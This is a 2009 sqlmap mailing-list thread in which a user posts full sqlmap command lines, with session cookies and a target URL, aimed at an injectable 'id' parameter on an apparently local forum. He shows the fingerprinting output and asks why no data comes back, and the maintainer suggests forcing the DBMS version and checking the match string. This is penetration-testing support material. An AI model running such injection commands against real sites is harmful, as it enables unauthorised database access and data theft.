Re: [sqlmap-users] Blind injection possible - no output
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Blind injection possible - no output
|
From: Bernardo D. A. G. <ber...@gm...> - 2009-09-17 16:52:16
|
Hi Erik, Try to force the back-end database software and version manually if you know it, e.g. --dbms "mysql 5" and double check that the provided string to match on is not present within any False response (eg. AND 1=2). Cheers, Bernardo On Tue, Sep 8, 2009 at 13:21, Erik Nilsson <da...@gm...> wrote: > sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2; > __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); > __utmb=107765125.29.10.1252406202; __utmc=107765125; > PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9" > --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id > --string="Secret Forum" --fingerprint > > [14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable > with 0 parenthesis > [14:09:04] [INFO] testing for parenthesis on injectable parameter > [14:09:06] [INFO] the injectable parameter requires 0 parenthesis > [14:09:06] [INFO] testing MySQL > [14:09:07] [INFO] confirming MySQL > [14:09:08] [INFO] retrieved: > [14:09:10] [INFO] the back-end DBMS is MySQL > [14:09:10] [INFO] retrieved: > [14:11:28] [INFO] retrieved: > [14:11:32] [INFO] retrieved: > [14:11:35] [INFO] retrieved: > [14:11:41] [INFO] retrieved: > [14:11:46] [INFO] executing MySQL comment injection fingerprint > web server operating system: Linux Ubuntu > web application technology: PHP 5.2.6, Apache > back-end DBMS: active fingerprint: MySQL < 3.22.11 > comment injection fingerprint: MySQL 5.0.75 > > > [*] shutting down at: 14:12:50 > > > sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2; > __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); > __utmb=107765125.29.10.1252406202; __utmc=107765125; > PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9" > --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id > --string="Secret Forum" --current-db > > [14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 pare > nthesis > [14:14:01] [INFO] testing for parenthesis on injectable parameter > [14:14:03] [INFO] the injectable parameter requires 0 parenthesis > [14:14:03] [INFO] testing MySQL > [14:14:04] [INFO] confirming MySQL > [14:14:05] [INFO] retrieved: > [14:14:07] [INFO] the back-end DBMS is MySQL > web server operating system: Linux Ubuntu > web application technology: PHP 5.2.6, Apache > back-end DBMS: MySQL < 5.0.0 > > [14:14:07] [INFO] fetching current database > [14:14:07] [INFO] retrieved: > current database: None > > > What to do? > > ------------------------------------------------------------------------------ > Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day > trial. Simplify your report design, integration and deployment - and focus on > what you do best, core application coding. Discover what's new with > Crystal Reports now. http://p.sf.net/sfu/bobj-july > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
